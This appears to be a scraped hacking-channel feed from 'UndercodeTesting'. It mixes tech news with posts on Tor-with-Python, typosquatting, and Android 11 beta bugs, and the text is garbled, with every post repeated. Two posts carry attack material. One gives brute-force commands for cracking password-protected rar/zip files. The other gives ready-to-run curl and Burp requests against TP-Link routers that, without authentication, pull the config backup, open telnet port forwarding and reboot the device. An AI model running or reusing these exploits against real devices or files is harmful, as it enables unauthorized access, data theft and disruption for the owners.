Forwarded from UNDERCODE NEWS
Improper authorization processing vulnerability for multiple Sensormatic Electronics products.
#Vulnerabilities
#Vulnerabilities
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Using Tor with Python:
How to use TOR with Python
1) For this tutorial we need Python and PIP
Additionally, we need the TOR expert package.
2) After this tutorial, you should be able to use TOR and Python together.
3) Download Tor
Download and install the TOR expert package on your system
https://www.torproject.org/download/tor/
4) Install Python requests
We need Python requests
5) You can install it using the following commands:
pip install requests
pip install requests [socks]
pip install requests [security]
Python code working with TOR
The following Python code allows you to run TOR and Python together.
We will use the requests library to execute requests.
Make sure you have TOR running before running the code.
import requests
domain = "https://itsecforu.ru"
#define your proxies
#the socks5h method allows the socks server to translate the #hostname. So make sure that you add 'socks5h'.
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
a = requests.get(domain.strip(), proxies=proxies).text
print(a)
When can you use this
There can be various reasons why you might want to use TOR and Python together.
Python itself is just a programming language, and if it works in Python, then most likely the same approach will work in other programming languages ββas well.
use case 1: crawler
You can use this code to create your own Python crawler via TOR.
Just create a list or dictionary of URLs you want to visit and instruct the tool to use your list.
myurls = ['url1','url2','url3','url4']
for url in myurls:
#dosomething
use case 2: Forensics
In some cases, you may only be interested in the text.
The code allows you to load entire pages without viewing visual content.
This can be a big advantage in some use cases.
my_interest = ['keyword1','keyword2','keyword3','keyword4']
for keyword in my_interest:
if keyword in a:
#dosomething
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Using Tor with Python:
How to use TOR with Python
1) For this tutorial we need Python and PIP
Additionally, we need the TOR expert package.
2) After this tutorial, you should be able to use TOR and Python together.
3) Download Tor
Download and install the TOR expert package on your system
https://www.torproject.org/download/tor/
4) Install Python requests
We need Python requests
5) You can install it using the following commands:
pip install requests
pip install requests [socks]
pip install requests [security]
Python code working with TOR
The following Python code allows you to run TOR and Python together.
We will use the requests library to execute requests.
Make sure you have TOR running before running the code.
import requests
domain = "https://itsecforu.ru"
#define your proxies
#the socks5h method allows the socks server to translate the #hostname. So make sure that you add 'socks5h'.
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
a = requests.get(domain.strip(), proxies=proxies).text
print(a)
When can you use this
There can be various reasons why you might want to use TOR and Python together.
Python itself is just a programming language, and if it works in Python, then most likely the same approach will work in other programming languages ββas well.
use case 1: crawler
You can use this code to create your own Python crawler via TOR.
Just create a list or dictionary of URLs you want to visit and instruct the tool to use your list.
myurls = ['url1','url2','url3','url4']
for url in myurls:
#dosomething
use case 2: Forensics
In some cases, you may only be interested in the text.
The code allows you to load entire pages without viewing visual content.
This can be a big advantage in some use cases.
my_interest = ['keyword1','keyword2','keyword3','keyword4']
for keyword in my_interest:
if keyword in a:
#dosomething
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
www.torproject.org
The Tor Project | Privacy & Freedom Online
Defend yourself against tracking and surveillance. Circumvent censorship.
Forwarded from UNDERCODE NEWS
Vietnam announced to stop production and import of 2/3G mobile phones to promote 4G and 5G.
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How terrible is the ancient attack technique called Typosquatting [misplantation]
The interesting thing about this is that the target of Tschacher's attack is not ordinary end users, but developers. If Tschacher really intends to attack and implants malicious code, the attack surface and spread speed are not comparable to ordinary phishing websites. Any attack initiated by developers can always spread rapidly in a short period of time, because if malicious code is implanted in the development process without even knowing it, then the end user will be attacked as a matter of course.
π¦For example, we want to visit a website whose domain name is n.com. Its binary expression is like this:
n . c o m
01101110 0101110 01100011 01101111 01101101
If a bit error occurs in the memory module and a bit error occurs, it will be as follows. When you visit the domain name n.com, the binary data needs to be stored once, but in the end, what we visit is actually o.com. This process is truly unconscious. If someone registers an o.com domain name to imitate the n.com website, the phishing success rate can reach almost 100%.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How terrible is the ancient attack technique called Typosquatting [misplantation]
The interesting thing about this is that the target of Tschacher's attack is not ordinary end users, but developers. If Tschacher really intends to attack and implants malicious code, the attack surface and spread speed are not comparable to ordinary phishing websites. Any attack initiated by developers can always spread rapidly in a short period of time, because if malicious code is implanted in the development process without even knowing it, then the end user will be attacked as a matter of course.
π¦For example, we want to visit a website whose domain name is n.com. Its binary expression is like this:
n . c o m
01101110 0101110 01100011 01101111 01101101
If a bit error occurs in the memory module and a bit error occurs, it will be as follows. When you visit the domain name n.com, the binary data needs to be stored once, but in the end, what we visit is actually o.com. This process is truly unconscious. If someone registers an o.com domain name to imitate the n.com website, the phishing success rate can reach almost 100%.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Pluton Processor is launched by Microsoft to include new Windows PC security features.
#Updates #Technologies
#Updates #Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Bruteforce password protected rar / zip files:
1) Linux
Clone rarPasswordCracker
git clone https://github.com/GauthamGoli/rarPasswordCracker.git
2) Change to the rarPasswordCracker directory.
cd rarPasswordCracker
3) Replace RARFILE.rar with the path to the .rar file you want to brute-force
4) python bruteforce.py --fr RARFILE.rar -c abcdefghijklmnopqrst0123 -n 6
π¦Sintakis
1) python bruteforce.py --fr filetocrack.rar -c charset -n sizeofpassword
2) python bruteforce.py --fr RARFILE.rar -c abcdefghijklmnopqrst0123 -n 6
3) python bruteforce.py --fz ZIPFILE.zip -c charset -n sizeofpassword
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Bruteforce password protected rar / zip files:
1) Linux
Clone rarPasswordCracker
git clone https://github.com/GauthamGoli/rarPasswordCracker.git
2) Change to the rarPasswordCracker directory.
cd rarPasswordCracker
3) Replace RARFILE.rar with the path to the .rar file you want to brute-force
4) python bruteforce.py --fr RARFILE.rar -c abcdefghijklmnopqrst0123 -n 6
π¦Sintakis
1) python bruteforce.py --fr filetocrack.rar -c charset -n sizeofpassword
2) python bruteforce.py --fr RARFILE.rar -c abcdefghijklmnopqrst0123 -n 6
3) python bruteforce.py --fz ZIPFILE.zip -c charset -n sizeofpassword
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - GauthamGoli/rar-Password-Cracker: Bruteforces a password protected rar/zip file with specified charset.
Bruteforces a password protected rar/zip file with specified charset. - GitHub - GauthamGoli/rar-Password-Cracker: Bruteforces a password protected rar/zip file with specified charset.
Forwarded from UNDERCODE NEWS
Apple: Developer commissions with annual revenues of less than $1 million will be reduced to 15%
Forwarded from UNDERCODE NEWS
CAB-J renewed pay TV contact rate survey in April next year, expanding survey area nationwide.
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top problems with Android 11 Beta and should you install it :
1) Google Pay doesn't work
The current version of Android 11 is not fully compatible with SafetyNet. Among other things, this means no access to Google Pay. You can run this application, but you cannot set a credit card there. Everything looks fine at first, but then the message "Unable to complete installation for payment in stores" appears.
2) New power menu is worse without Google Home
Many praise the power menu in Android 11. There are switches for controlling home appliances. If you don't use the Google Home app or don't have smart appliances, the menu gets worse.
a)You cannot click on an empty space to close the menu, you must use the back gesture.
b)The Restart and Shutdown buttons are at the very top and are difficult to reach due to the empty space where the buttons for household appliances could be.
c)The Lock button is hidden behind another menu to make room for fixture buttons you don't have.
d)The menu supports smart home applications, but applications do not yet support this menu.
3) Custom launchers can be reset
This bug will be fixed in future beta versions, but now the system periodically returns to the Pixel Launcher on its own instead of the launcher you installed. Usually, the screen turns off and on, after which your launcher returns.
4) The shape of the new icons does not fit the new context document
If you are using icons with new shapes from the Styles and Wallpapers section, they interfere with another cool new feature. If you define a new contextual dock when you apply a theme with one of five new icon shapes (pebble, beveled rectangle, vessel, hexagon, and flower), the responsive dock icons will revert to static versions.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top problems with Android 11 Beta and should you install it :
1) Google Pay doesn't work
The current version of Android 11 is not fully compatible with SafetyNet. Among other things, this means no access to Google Pay. You can run this application, but you cannot set a credit card there. Everything looks fine at first, but then the message "Unable to complete installation for payment in stores" appears.
2) New power menu is worse without Google Home
Many praise the power menu in Android 11. There are switches for controlling home appliances. If you don't use the Google Home app or don't have smart appliances, the menu gets worse.
a)You cannot click on an empty space to close the menu, you must use the back gesture.
b)The Restart and Shutdown buttons are at the very top and are difficult to reach due to the empty space where the buttons for household appliances could be.
c)The Lock button is hidden behind another menu to make room for fixture buttons you don't have.
d)The menu supports smart home applications, but applications do not yet support this menu.
3) Custom launchers can be reset
This bug will be fixed in future beta versions, but now the system periodically returns to the Pixel Launcher on its own instead of the launcher you installed. Usually, the screen turns off and on, after which your launcher returns.
4) The shape of the new icons does not fit the new context document
If you are using icons with new shapes from the Styles and Wallpapers section, they interfere with another cool new feature. If you define a new contextual dock when you apply a theme with one of five new icon shapes (pebble, beveled rectangle, vessel, hexagon, and flower), the responsive dock icons will revert to static versions.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Evil Actions Without Authentication example : also in tp link routers :
A) Burp Request and curl command for conf.bin or backup file
=================
####### Burp ########
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Agent22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Connection: close
Upgrade-Insecure-Requests: 1
-------Response--------
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5720
Connection: close
w@\ΓΓb ΓͺLΓ½ΒͺΓ―Γβ‘ΓEβΉΓ»aΓΒ¬,*-Γ h[ΓβΉΒ³lΓβ¬ΓΓ.Β©-
.....SKIP.......
8/οΏ½οΏ½οΏ½οΏ½W
######## Curl ##########
curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H
$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $'
http://192.168.0.1/cgi/conf.bin' > backup.bin
------ take a look in backup.bin file --------
===========================================
=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP
or UDP\x0d\x0aopenProtocol=TCP or
UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0
----- Decription -----
enable=0 is for disable
enable=1 is for enable
u can change port also.
====================================
=========== Reboot Router =========================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[error]0
----Description -----
error = 0 means reboot seccessully
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Evil Actions Without Authentication example : also in tp link routers :
A) Burp Request and curl command for conf.bin or backup file
=================
####### Burp ########
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Agent22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Connection: close
Upgrade-Insecure-Requests: 1
-------Response--------
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5720
Connection: close
w@\ΓΓb ΓͺLΓ½ΒͺΓ―Γβ‘ΓEβΉΓ»aΓΒ¬,*-Γ h[ΓβΉΒ³lΓβ¬ΓΓ.Β©-
.....SKIP.......
8/οΏ½οΏ½οΏ½οΏ½W
######## Curl ##########
curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H
$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $'
http://192.168.0.1/cgi/conf.bin' > backup.bin
------ take a look in backup.bin file --------
===========================================
=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP
or UDP\x0d\x0aopenProtocol=TCP or
UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0
----- Decription -----
enable=0 is for disable
enable=1 is for enable
u can change port also.
====================================
=========== Reboot Router =========================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[error]0
----Description -----
error = 0 means reboot seccessully
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
